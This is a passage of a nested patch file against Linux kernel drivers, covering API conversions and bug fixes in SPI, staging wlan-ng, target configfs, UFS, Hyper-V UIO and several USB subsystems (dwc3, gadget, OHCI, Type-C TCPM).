+-	spi_engine = devm_kzalloc(&pdev->dev, sizeof(*spi_engine), GFP_KERNEL);
+-	if (!spi_engine)
+-		return -ENOMEM;
+-
+-	master = spi_alloc_master(&pdev->dev, 0);
+-	if (!master)
++	host = devm_spi_alloc_host(&pdev->dev, sizeof(*spi_engine));
++	if (!host)
+ 		return -ENOMEM;
+ 
+-	spi_master_set_devdata(master, spi_engine);
++	spi_engine = spi_controller_get_devdata(host);
+ 
+ 	spin_lock_init(&spi_engine->lock);
++	ida_init(&spi_engine->sync_ida);
+ 
+-	spi_engine->clk = devm_clk_get(&pdev->dev, "s_axi_aclk");
+-	if (IS_ERR(spi_engine->clk)) {
+-		ret = PTR_ERR(spi_engine->clk);
+-		goto err_put_master;
+-	}
+-
+-	spi_engine->ref_clk = devm_clk_get(&pdev->dev, "spi_clk");
+-	if (IS_ERR(spi_engine->ref_clk)) {
+-		ret = PTR_ERR(spi_engine->ref_clk);
+-		goto err_put_master;
+-	}
++	spi_engine->clk = devm_clk_get_enabled(&pdev->dev, "s_axi_aclk");
++	if (IS_ERR(spi_engine->clk))
++		return PTR_ERR(spi_engine->clk);
+ 
+-	ret = clk_prepare_enable(spi_engine->clk);
+-	if (ret)
+-		goto err_put_master;
+-
+-	ret = clk_prepare_enable(spi_engine->ref_clk);
+-	if (ret)
+-		goto err_clk_disable;
++	spi_engine->ref_clk = devm_clk_get_enabled(&pdev->dev, "spi_clk");
++	if (IS_ERR(spi_engine->ref_clk))
++		return PTR_ERR(spi_engine->ref_clk);
+ 
+ 	spi_engine->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(spi_engine->base)) {
+-		ret = PTR_ERR(spi_engine->base);
+-		goto err_ref_clk_disable;
+-	}
+-
+-	version = readl(spi_engine->base + SPI_ENGINE_REG_VERSION);
+-	if (SPI_ENGINE_VERSION_MAJOR(version) != 1) {
+-		dev_err(&pdev->dev, "Unsupported peripheral version %u.%u.%c\n",
+-			SPI_ENGINE_VERSION_MAJOR(version),
+-			SPI_ENGINE_VERSION_MINOR(version),
+-			SPI_ENGINE_VERSION_PATCH(version));
+-		ret = -ENODEV;
+-		goto err_ref_clk_disable;
++	if (IS_ERR(spi_engine->base))
++		return PTR_ERR(spi_engine->base);
++
++	version = readl(spi_engine->base + ADI_AXI_REG_VERSION);
++	if (ADI_AXI_PCORE_VER_MAJOR(version) != 1) {
++		dev_err(&pdev->dev, "Unsupported peripheral version %u.%u.%u\n",
++			ADI_AXI_PCORE_VER_MAJOR(version),
++			ADI_AXI_PCORE_VER_MINOR(version),
++			ADI_AXI_PCORE_VER_PATCH(version));
++		return -ENODEV;
+ 	}
+ 
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_RESET);
+ 	writel_relaxed(0xff, spi_engine->base + SPI_ENGINE_REG_INT_PENDING);
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_INT_ENABLE);
+ 
+-	ret = request_irq(irq, spi_engine_irq, 0, pdev->name, master);
++	ret = request_irq(irq, spi_engine_irq, 0, pdev->name, host);
+ 	if (ret)
+-		goto err_ref_clk_disable;
++		return ret;
+ 
+-	master->dev.of_node = pdev->dev.of_node;
+-	master->mode_bits = SPI_CPOL | SPI_CPHA | SPI_3WIRE;
+-	master->bits_per_word_mask = SPI_BPW_MASK(8);
+-	master->max_speed_hz = clk_get_rate(spi_engine->ref_clk) / 2;
+-	master->transfer_one_message = spi_engine_transfer_one_message;
+-	master->num_chipselect = 8;
++	host->dev.of_node = pdev->dev.of_node;
++	host->mode_bits = SPI_CPOL | SPI_CPHA | SPI_3WIRE;
++	host->bits_per_word_mask = SPI_BPW_MASK(8);
++	host->max_speed_hz = clk_get_rate(spi_engine->ref_clk) / 2;
++	host->transfer_one_message = spi_engine_transfer_one_message;
++	host->num_chipselect = 8;
+ 
+-	ret = spi_register_master(master);
++	ret = spi_register_controller(host);
+ 	if (ret)
+ 		goto err_free_irq;
+ 
+-	platform_set_drvdata(pdev, master);
++	platform_set_drvdata(pdev, host);
+ 
+ 	return 0;
+ err_free_irq:
+-	free_irq(irq, master);
+-err_ref_clk_disable:
+-	clk_disable_unprepare(spi_engine->ref_clk);
+-err_clk_disable:
+-	clk_disable_unprepare(spi_engine->clk);
+-err_put_master:
+-	spi_master_put(master);
++	free_irq(irq, host);
+ 	return ret;
+ }
+ 
+-static int spi_engine_remove(struct platform_device *pdev)
++static void spi_engine_remove(struct platform_device *pdev)
+ {
+-	struct spi_master *master = spi_master_get(platform_get_drvdata(pdev));
+-	struct spi_engine *spi_engine = spi_master_get_devdata(master);
++	struct spi_controller *host = platform_get_drvdata(pdev);
++	struct spi_engine *spi_engine = spi_controller_get_devdata(host);
+ 	int irq = platform_get_irq(pdev, 0);
+ 
+-	spi_unregister_master(master);
+-
+-	free_irq(irq, master);
++	spi_unregister_controller(host);
+ 
+-	spi_master_put(master);
++	free_irq(irq, host);
+ 
+ 	writel_relaxed(0xff, spi_engine->base + SPI_ENGINE_REG_INT_PENDING);
+ 	writel_relaxed(0x00, spi_engine->base + SPI_ENGINE_REG_INT_ENABLE);
+ 	writel_relaxed(0x01, spi_engine->base + SPI_ENGINE_REG_RESET);
+-
+-	clk_disable_unprepare(spi_engine->ref_clk);
+-	clk_disable_unprepare(spi_engine->clk);
+-
+-	return 0;
+ }
+ 
+ static const struct of_device_id spi_engine_match_table[] = {
+@@ -584,7 +589,7 @@ MODULE_DEVICE_TABLE(of, spi_engine_match_table);
+ 
+ static struct platform_driver spi_engine_driver = {
+ 	.probe = spi_engine_probe,
+-	.remove = spi_engine_remove,
++	.remove_new = spi_engine_remove,
+ 	.driver = {
+ 		.name = "spi-engine",
+ 		.of_match_table = spi_engine_match_table,
+diff --git a/drivers/spi/spi-hisi-kunpeng.c b/drivers/spi/spi-hisi-kunpeng.c
+index 525cc0143a305..54730e93fba45 100644
+--- a/drivers/spi/spi-hisi-kunpeng.c
++++ b/drivers/spi/spi-hisi-kunpeng.c
+@@ -151,8 +151,6 @@ static const struct debugfs_reg32 hisi_spi_regs[] = {
+ 	HISI_SPI_DBGFS_REG("ENR", HISI_SPI_ENR),
+ 	HISI_SPI_DBGFS_REG("FIFOC", HISI_SPI_FIFOC),
+ 	HISI_SPI_DBGFS_REG("IMR", HISI_SPI_IMR),
+-	HISI_SPI_DBGFS_REG("DIN", HISI_SPI_DIN),
+-	HISI_SPI_DBGFS_REG("DOUT", HISI_SPI_DOUT),
+ 	HISI_SPI_DBGFS_REG("SR", HISI_SPI_SR),
+ 	HISI_SPI_DBGFS_REG("RISR", HISI_SPI_RISR),
+ 	HISI_SPI_DBGFS_REG("ISR", HISI_SPI_ISR),
+diff --git a/drivers/spi/spi-microchip-core-qspi.c b/drivers/spi/spi-microchip-core-qspi.c
+index 19a6a46829f6d..620c5d19031e2 100644
+--- a/drivers/spi/spi-microchip-core-qspi.c
++++ b/drivers/spi/spi-microchip-core-qspi.c
+@@ -283,6 +283,7 @@ static int mchp_coreqspi_setup_clock(struct mchp_coreqspi *qspi, struct spi_devi
+ 	}
+ 
+ 	control = readl_relaxed(qspi->regs + REG_CONTROL);
++	control &= ~CONTROL_CLKRATE_MASK;
+ 	control |= baud_rate_val << CONTROL_CLKRATE_SHIFT;
+ 	writel_relaxed(control, qspi->regs + REG_CONTROL);
+ 	control = readl_relaxed(qspi->regs + REG_CONTROL);
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 19688f333e0bc..1018feff468c9 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -2774,6 +2774,17 @@ int spi_slave_abort(struct spi_device *spi)
+ }
+ EXPORT_SYMBOL_GPL(spi_slave_abort);
+ 
++int spi_target_abort(struct spi_device *spi)
++{
++	struct spi_controller *ctlr = spi->controller;
++
++	if (spi_controller_is_target(ctlr) && ctlr->target_abort)
++		return ctlr->target_abort(ctlr);
++
++	return -ENOTSUPP;
++}
++EXPORT_SYMBOL_GPL(spi_target_abort);
++
+ static ssize_t slave_show(struct device *dev, struct device_attribute *attr,
+ 			  char *buf)
+ {
+@@ -4206,6 +4217,7 @@ static int __spi_sync(struct spi_device *spi, struct spi_message *message)
+ 		wait_for_completion(&done);
+ 		status = message->status;
+ 	}
++	message->complete = NULL;
+ 	message->context = NULL;
+ 
+ 	return status;
+diff --git a/drivers/staging/wlan-ng/hfa384x_usb.c b/drivers/staging/wlan-ng/hfa384x_usb.c
+index 02fdef7a16c87..c7cd54171d994 100644
+--- a/drivers/staging/wlan-ng/hfa384x_usb.c
++++ b/drivers/staging/wlan-ng/hfa384x_usb.c
+@@ -1116,8 +1116,8 @@ static int hfa384x_usbctlx_complete_sync(struct hfa384x *hw,
+ 		if (ctlx == get_active_ctlx(hw)) {
+ 			spin_unlock_irqrestore(&hw->ctlxq.lock, flags);
+ 
+-			del_singleshot_timer_sync(&hw->reqtimer);
+-			del_singleshot_timer_sync(&hw->resptimer);
++			del_timer_sync(&hw->reqtimer);
++			del_timer_sync(&hw->resptimer);
+ 			hw->req_timer_done = 1;
+ 			hw->resp_timer_done = 1;
+ 			usb_kill_urb(&hw->ctlx_urb);
+diff --git a/drivers/staging/wlan-ng/prism2usb.c b/drivers/staging/wlan-ng/prism2usb.c
+index e13da7fadffff..c13f1699e5a2f 100644
+--- a/drivers/staging/wlan-ng/prism2usb.c
++++ b/drivers/staging/wlan-ng/prism2usb.c
+@@ -170,9 +170,9 @@ static void prism2sta_disconnect_usb(struct usb_interface *interface)
+ 		 */
+ 		prism2sta_ifstate(wlandev, P80211ENUM_ifstate_disable);
+ 
+-		del_singleshot_timer_sync(&hw->throttle);
+-		del_singleshot_timer_sync(&hw->reqtimer);
+-		del_singleshot_timer_sync(&hw->resptimer);
++		del_timer_sync(&hw->throttle);
++		del_timer_sync(&hw->reqtimer);
++		del_timer_sync(&hw->resptimer);
+ 
+ 		/* Unlink all the URBs. This "removes the wheels"
+ 		 * from the entire CTLX handling mechanism.
+diff --git a/drivers/target/target_core_configfs.c b/drivers/target/target_core_configfs.c
+index 416514c5c7acd..1a26dd0d56662 100644
+--- a/drivers/target/target_core_configfs.c
++++ b/drivers/target/target_core_configfs.c
+@@ -3587,6 +3587,8 @@ static int __init target_core_init_configfs(void)
+ {
+ 	struct configfs_subsystem *subsys = &target_core_fabrics;
+ 	struct t10_alua_lu_gp *lu_gp;
++	struct cred *kern_cred;
++	const struct cred *old_cred;
+ 	int ret;
+ 
+ 	pr_debug("TARGET_CORE[0]: Loading Generic Kernel Storage"
+@@ -3663,11 +3665,21 @@ static int __init target_core_init_configfs(void)
+ 	if (ret < 0)
+ 		goto out;
+ 
++	/* We use the kernel credentials to access the target directory */
++	kern_cred = prepare_kernel_cred(&init_task);
++	if (!kern_cred) {
++		ret = -ENOMEM;
++		goto out;
++	}
++	old_cred = override_creds(kern_cred);
+ 	target_init_dbroot();
++	revert_creds(old_cred);
++	put_cred(kern_cred);
+ 
+ 	return 0;
+ 
+ out:
++	target_xcopy_release_pt();
+ 	configfs_unregister_subsystem(subsys);
+ 	core_dev_release_virtual_lun0();
+ 	rd_module_exit();
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index f3c25467e571f..948449a13247c 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -9044,7 +9044,10 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 
+ 	/* UFS device & link must be active before we enter in this function */
+ 	if (!ufshcd_is_ufs_dev_active(hba) || !ufshcd_is_link_active(hba)) {
+-		ret = -EINVAL;
++		/*  Wait err handler finish or trigger err recovery */
++		if (!ufshcd_eh_in_progress(hba))
++			ufshcd_force_error_recovery(hba);
++		ret = -EBUSY;
+ 		goto enable_scaling;
+ 	}
+ 
+diff --git a/drivers/uio/uio_hv_generic.c b/drivers/uio/uio_hv_generic.c
+index c08a6cfd119f2..e5789dfcaff61 100644
+--- a/drivers/uio/uio_hv_generic.c
++++ b/drivers/uio/uio_hv_generic.c
+@@ -181,12 +181,14 @@ hv_uio_cleanup(struct hv_device *dev, struct hv_uio_private_data *pdata)
+ {
+ 	if (pdata->send_gpadl.gpadl_handle) {
+ 		vmbus_teardown_gpadl(dev->channel, &pdata->send_gpadl);
+-		vfree(pdata->send_buf);
++		if (!pdata->send_gpadl.decrypted)
++			vfree(pdata->send_buf);
+ 	}
+ 
+ 	if (pdata->recv_gpadl.gpadl_handle) {
+ 		vmbus_teardown_gpadl(dev->channel, &pdata->recv_gpadl);
+-		vfree(pdata->recv_buf);
++		if (!pdata->recv_gpadl.decrypted)
++			vfree(pdata->recv_buf);
+ 	}
+ }
+ 
+@@ -295,7 +297,8 @@ hv_uio_probe(struct hv_device *dev,
+ 	ret = vmbus_establish_gpadl(channel, pdata->recv_buf,
+ 				    RECV_BUFFER_SIZE, &pdata->recv_gpadl);
+ 	if (ret) {
+-		vfree(pdata->recv_buf);
++		if (!pdata->recv_gpadl.decrypted)
++			vfree(pdata->recv_buf);
+ 		goto fail_close;
+ 	}
+ 
+@@ -317,7 +320,8 @@ hv_uio_probe(struct hv_device *dev,
+ 	ret = vmbus_establish_gpadl(channel, pdata->send_buf,
+ 				    SEND_BUFFER_SIZE, &pdata->send_gpadl);
+ 	if (ret) {
+-		vfree(pdata->send_buf);
++		if (!pdata->send_gpadl.decrypted)
++			vfree(pdata->send_buf);
+ 		goto fail_close;
+ 	}
+ 
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index dea110241ee71..50a5608c204f4 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -5069,9 +5069,10 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	}
+ 	if (usb_endpoint_maxp(&udev->ep0.desc) == i) {
+ 		;	/* Initial ep0 maxpacket guess is right */
+-	} else if ((udev->speed == USB_SPEED_FULL ||
++	} else if (((udev->speed == USB_SPEED_FULL ||
+ 				udev->speed == USB_SPEED_HIGH) &&
+-			(i == 8 || i == 16 || i == 32 || i == 64)) {
++			(i == 8 || i == 16 || i == 32 || i == 64)) ||
++			(udev->speed >= USB_SPEED_SUPER && i > 0)) {
+ 		/* Initial guess is wrong; use the descriptor's value */
+ 		if (udev->speed == USB_SPEED_FULL)
+ 			dev_dbg(&udev->dev, "ep0 maxpacket = %d\n", i);
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index 93a63b7f164d1..0007031fad0de 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -23,13 +23,15 @@ static ssize_t disable_show(struct device *dev,
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 	struct usb_device *hdev = to_usb_device(dev->parent->parent);
+ 	struct usb_hub *hub = usb_hub_to_struct_hub(hdev);
+-	struct usb_interface *intf = to_usb_interface(hub->intfdev);
++	struct usb_interface *intf = to_usb_interface(dev->parent);
+ 	int port1 = port_dev->portnum;
+ 	u16 portstatus, unused;
+ 	bool disabled;
+ 	int rc;
+ 	struct kernfs_node *kn;
+ 
++	if (!hub)
++		return -ENODEV;
+ 	hub_get(hub);
+ 	rc = usb_autopm_get_interface(intf);
+ 	if (rc < 0)
+@@ -73,12 +75,14 @@ static ssize_t disable_store(struct device *dev, struct device_attribute *attr,
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 	struct usb_device *hdev = to_usb_device(dev->parent->parent);
+ 	struct usb_hub *hub = usb_hub_to_struct_hub(hdev);
+-	struct usb_interface *intf = to_usb_interface(hub->intfdev);
++	struct usb_interface *intf = to_usb_interface(dev->parent);
+ 	int port1 = port_dev->portnum;
+ 	bool disabled;
+ 	int rc;
+ 	struct kernfs_node *kn;
+ 
++	if (!hub)
++		return -ENODEV;
+ 	rc = strtobool(buf, &disabled);
+ 	if (rc)
+ 		return rc;
+diff --git a/drivers/usb/dwc3/core.c b/drivers/usb/dwc3/core.c
+index 011a3909f9ad1..3b5482621e5e0 100644
+--- a/drivers/usb/dwc3/core.c
++++ b/drivers/usb/dwc3/core.c
+@@ -104,6 +104,27 @@ static int dwc3_get_dr_mode(struct dwc3 *dwc)
+ 	return 0;
+ }
+ 
++void dwc3_enable_susphy(struct dwc3 *dwc, bool enable)
++{
++	u32 reg;
++
++	reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
++	if (enable && !dwc->dis_u3_susphy_quirk)
++		reg |= DWC3_GUSB3PIPECTL_SUSPHY;
++	else
++		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
++
++	dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), reg);
++
++	reg = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
++	if (enable && !dwc->dis_u2_susphy_quirk)
++		reg |= DWC3_GUSB2PHYCFG_SUSPHY;
++	else
++		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
++
++	dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), reg);
++}
++
+ void dwc3_set_prtcap(struct dwc3 *dwc, u32 mode)
+ {
+ 	u32 reg;
+@@ -669,11 +690,8 @@ static int dwc3_core_ulpi_init(struct dwc3 *dwc)
+  */
+ static int dwc3_phy_setup(struct dwc3 *dwc)
+ {
+-	unsigned int hw_mode;
+ 	u32 reg;
+ 
+-	hw_mode = DWC3_GHWPARAMS0_MODE(dwc->hwparams.hwparams0);
+-
+ 	reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+ 
+ 	/*
+@@ -683,21 +701,16 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	reg &= ~DWC3_GUSB3PIPECTL_UX_EXIT_PX;
+ 
+ 	/*
+-	 * Above 1.94a, it is recommended to set DWC3_GUSB3PIPECTL_SUSPHY
+-	 * to '0' during coreConsultant configuration. So default value
+-	 * will be '0' when the core is reset. Application needs to set it
+-	 * to '1' after the core initialization is completed.
+-	 */
+-	if (!DWC3_VER_IS_WITHIN(DWC3, ANY, 194A))
+-		reg |= DWC3_GUSB3PIPECTL_SUSPHY;
+-
+-	/*
+-	 * For DRD controllers, GUSB3PIPECTL.SUSPENDENABLE must be cleared after
+-	 * power-on reset, and it can be set after core initialization, which is
+-	 * after device soft-reset during initialization.
++	 * Above DWC_usb3.0 1.94a, it is recommended to set
++	 * DWC3_GUSB3PIPECTL_SUSPHY to '0' during coreConsultant configuration.
++	 * So default value will be '0' when the core is reset. Application
++	 * needs to set it to '1' after the core initialization is completed.
++	 *
++	 * Similarly for DRD controllers, GUSB3PIPECTL.SUSPENDENABLE must be
++	 * cleared after power-on reset, and it can be set after core
++	 * initialization.
+ 	 */
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD)
+-		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
++	reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
+ 
+ 	if (dwc->u2ss_inp3_quirk)
+ 		reg |= DWC3_GUSB3PIPECTL_U2SSINP3OK;
+@@ -723,9 +736,6 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	if (dwc->tx_de_emphasis_quirk)
+ 		reg |= DWC3_GUSB3PIPECTL_TX_DEEPH(dwc->tx_de_emphasis);
+ 
+-	if (dwc->dis_u3_susphy_quirk)
+-		reg &= ~DWC3_GUSB3PIPECTL_SUSPHY;
+-
+ 	if (dwc->dis_del_phy_power_chg_quirk)
+ 		reg &= ~DWC3_GUSB3PIPECTL_DEPOCHANGE;
+ 
+@@ -773,24 +783,15 @@ static int dwc3_phy_setup(struct dwc3 *dwc)
+ 	}
+ 
+ 	/*
+-	 * Above 1.94a, it is recommended to set DWC3_GUSB2PHYCFG_SUSPHY to
+-	 * '0' during coreConsultant configuration. So default value will
+-	 * be '0' when the core is reset. Application needs to set it to
+-	 * '1' after the core initialization is completed.
+-	 */
+-	if (!DWC3_VER_IS_WITHIN(DWC3, ANY, 194A))
+-		reg |= DWC3_GUSB2PHYCFG_SUSPHY;
+-
+-	/*
+-	 * For DRD controllers, GUSB2PHYCFG.SUSPHY must be cleared after
+-	 * power-on reset, and it can be set after core initialization, which is
+-	 * after device soft-reset during initialization.
++	 * Above DWC_usb3.0 1.94a, it is recommended to set
++	 * DWC3_GUSB2PHYCFG_SUSPHY to '0' during coreConsultant configuration.
++	 * So default value will be '0' when the core is reset. Application
++	 * needs to set it to '1' after the core initialization is completed.
++	 *
++	 * Similarly for DRD controllers, GUSB2PHYCFG.SUSPHY must be cleared
++	 * after power-on reset, and it can be set after core initialization.
+ 	 */
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD)
+-		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
+-
+-	if (dwc->dis_u2_susphy_quirk)
+-		reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
++	reg &= ~DWC3_GUSB2PHYCFG_SUSPHY;
+ 
+ 	if (dwc->dis_enblslpm_quirk)
+ 		reg &= ~DWC3_GUSB2PHYCFG_ENBLSLPM;
+@@ -1238,21 +1239,6 @@ static int dwc3_core_init(struct dwc3 *dwc)
+ 	if (ret)
+ 		goto err1;
+ 
+-	if (hw_mode == DWC3_GHWPARAMS0_MODE_DRD &&
+-	    !DWC3_VER_IS_WITHIN(DWC3, ANY, 194A)) {
+-		if (!dwc->dis_u3_susphy_quirk) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GUSB3PIPECTL(0));
+-			reg |= DWC3_GUSB3PIPECTL_SUSPHY;
+-			dwc3_writel(dwc->regs, DWC3_GUSB3PIPECTL(0), reg);
+-		}
+-
+-		if (!dwc->dis_u2_susphy_quirk) {
+-			reg = dwc3_readl(dwc->regs, DWC3_GUSB2PHYCFG(0));
+-			reg |= DWC3_GUSB2PHYCFG_SUSPHY;
+-			dwc3_writel(dwc->regs, DWC3_GUSB2PHYCFG(0), reg);
+-		}
+-	}
+-
+ 	dwc3_core_setup_global_control(dwc);
+ 	dwc3_core_num_eps(dwc);
+ 
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 889c122dad457..472a6a7e1558a 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1558,6 +1558,7 @@ int dwc3_event_buffers_setup(struct dwc3 *dwc);
+ void dwc3_event_buffers_cleanup(struct dwc3 *dwc);
+ 
+ int dwc3_core_soft_reset(struct dwc3 *dwc);
++void dwc3_enable_susphy(struct dwc3 *dwc, bool enable);
+ 
+ #if IS_ENABLED(CONFIG_USB_DWC3_HOST) || IS_ENABLED(CONFIG_USB_DWC3_DUAL_ROLE)
+ int dwc3_host_init(struct dwc3 *dwc);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index b134110cc2ed5..2d7ac92ce9b84 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2831,6 +2831,7 @@ static int __dwc3_gadget_start(struct dwc3 *dwc)
+ 	dwc3_ep0_out_start(dwc);
+ 
+ 	dwc3_gadget_enable_irq(dwc);
++	dwc3_enable_susphy(dwc, true);
+ 
+ 	return 0;
+ 
+@@ -4573,6 +4574,7 @@ void dwc3_gadget_exit(struct dwc3 *dwc)
+ 	if (!dwc->gadget)
+ 		return;
+ 
++	dwc3_enable_susphy(dwc, false);
+ 	usb_del_gadget(dwc->gadget);
+ 	dwc3_gadget_free_endpoints(dwc);
+ 	usb_put_gadget(dwc->gadget);
+diff --git a/drivers/usb/dwc3/host.c b/drivers/usb/dwc3/host.c
+index f4d8e80c4c347..c0dba453f1b8e 100644
+--- a/drivers/usb/dwc3/host.c
++++ b/drivers/usb/dwc3/host.c
+@@ -10,9 +10,30 @@
+ #include <linux/irq.h>
+ #include <linux/of.h>
+ #include <linux/platform_device.h>
++#include <linux/usb.h>
++#include <linux/usb/hcd.h>
+ 
++#include "../host/xhci-plat.h"
+ #include "core.h"
+ 
++static void dwc3_xhci_plat_start(struct usb_hcd *hcd)
++{
++	struct platform_device *pdev;
++	struct dwc3 *dwc;
++
++	if (!usb_hcd_is_primary_hcd(hcd))
++		return;
++
++	pdev = to_platform_device(hcd->self.controller);
++	dwc = dev_get_drvdata(pdev->dev.parent);
++
++	dwc3_enable_susphy(dwc, true);
++}
++
++static const struct xhci_plat_priv dwc3_xhci_plat_quirk = {
++	.plat_start = dwc3_xhci_plat_start,
++};
++
+ static void dwc3_host_fill_xhci_irq_res(struct dwc3 *dwc,
+ 					int irq, char *name)
+ {
+@@ -122,6 +143,11 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 		}
+ 	}
+ 
++	ret = platform_device_add_data(xhci, &dwc3_xhci_plat_quirk,
++				       sizeof(struct xhci_plat_priv));
++	if (ret)
++		goto err;
++
+ 	ret = platform_device_add(xhci);
+ 	if (ret) {
+ 		dev_err(dwc->dev, "failed to register xHCI device\n");
+@@ -136,6 +162,7 @@ int dwc3_host_init(struct dwc3 *dwc)
+ 
+ void dwc3_host_exit(struct dwc3 *dwc)
+ {
++	dwc3_enable_susphy(dwc, false);
+ 	platform_device_unregister(dwc->xhci);
+ 	dwc->xhci = NULL;
+ }
+diff --git a/drivers/usb/gadget/composite.c b/drivers/usb/gadget/composite.c
+index 247cca46cdfae..f10e43a948fd8 100644
+--- a/drivers/usb/gadget/composite.c
++++ b/drivers/usb/gadget/composite.c
+@@ -1993,7 +1993,7 @@ composite_setup(struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
+ 			buf[5] = 0x01;
+ 			switch (ctrl->bRequestType & USB_RECIP_MASK) {
+ 			case USB_RECIP_DEVICE:
+-				if (w_index != 0x4 || (w_value >> 8))
++				if (w_index != 0x4 || (w_value & 0xff))
+ 					break;
+ 				buf[6] = w_index;
+ 				/* Number of ext compat interfaces */
+@@ -2009,9 +2009,9 @@ composite_setup(struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
+ 				}
+ 				break;
+ 			case USB_RECIP_INTERFACE:
+-				if (w_index != 0x5 || (w_value >> 8))
++				if (w_index != 0x5 || (w_value & 0xff))
+ 					break;
+-				interface = w_value & 0xFF;
++				interface = w_value >> 8;
+ 				if (interface >= MAX_CONFIG_INTERFACES ||
+ 				    !os_desc_cfg->interface[interface])
+ 					break;
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 3e59055aa5040..b2da74bb107af 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -3414,7 +3414,7 @@ static int ffs_func_setup(struct usb_function *f,
+ 	__ffs_event_add(ffs, FUNCTIONFS_SETUP);
+ 	spin_unlock_irqrestore(&ffs->ev.waitq.lock, flags);
+ 
+-	return creq->wLength == 0 ? USB_GADGET_DELAYED_STATUS : 0;
++	return ffs->ev.setup.wLength == 0 ? USB_GADGET_DELAYED_STATUS : 0;
+ }
+ 
+ static bool ffs_func_req_match(struct usb_function *f,
+diff --git a/drivers/usb/host/ohci-hcd.c b/drivers/usb/host/ohci-hcd.c
+index 0457dd9f6c19a..ab175e181e55c 100644
+--- a/drivers/usb/host/ohci-hcd.c
++++ b/drivers/usb/host/ohci-hcd.c
+@@ -888,6 +888,7 @@ static irqreturn_t ohci_irq (struct usb_hcd *hcd)
+ 	/* Check for an all 1's result which is a typical consequence
+ 	 * of dead, unclocked, or unplugged (CardBus...) devices
+ 	 */
++again:
+ 	if (ints == ~(u32)0) {
+ 		ohci->rh_state = OHCI_RH_HALTED;
+ 		ohci_dbg (ohci, "device removed!\n");
+@@ -982,6 +983,13 @@ static irqreturn_t ohci_irq (struct usb_hcd *hcd)
+ 	}
+ 	spin_unlock(&ohci->lock);
+ 
++	/* repeat until all enabled interrupts are handled */
++	if (ohci->rh_state != OHCI_RH_HALTED) {
++		ints = ohci_readl(ohci, &regs->intrstatus);
++		if (ints && (ints & ohci_readl(ohci, &regs->intrenable)))
++			goto again;
++	}
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/usb/host/xhci-plat.h b/drivers/usb/host/xhci-plat.h
+index 1fb149d1fbcea..f3abce238207e 100644
+--- a/drivers/usb/host/xhci-plat.h
++++ b/drivers/usb/host/xhci-plat.h
+@@ -8,7 +8,9 @@
+ #ifndef _XHCI_PLAT_H
+ #define _XHCI_PLAT_H
+ 
+-#include "xhci.h"	/* for hcd_to_xhci() */
++struct device;
++struct platform_device;
++struct usb_hcd;
+ 
+ struct xhci_plat_priv {
+ 	const char *firmware_name;
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index bf615dc8085e9..bbcc0e0aa070a 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1479,7 +1479,8 @@ static void svdm_consume_identity(struct tcpm_port *port, const u32 *p, int cnt)
+ 	port->partner_ident.cert_stat = p[VDO_INDEX_CSTAT];
+ 	port->partner_ident.product = product;
+ 
+-	typec_partner_set_identity(port->partner);
++	if (port->partner)
++		typec_partner_set_identity(port->partner);
+ 
+ 	tcpm_log(port, "Identity: %04x:%04x.%04x",
+ 		 PD_IDH_VID(vdo),
+@@ -1567,6 +1568,9 @@ static void tcpm_register_partner_altmodes(struct tcpm_port *port)
+ 	struct typec_altmode *altmode;
+ 	int i;
+ 
++	if (!port->partner)
++		return;
++
+ 	for (i = 0; i < modep->altmodes; i++) {
+ 		altmode = typec_partner_register_altmode(port->partner,
+ 						&modep->altmode_desc[i]);
+@@ -2416,7 +2420,7 @@ static int tcpm_register_sink_caps(struct tcpm_port *port)
+ {
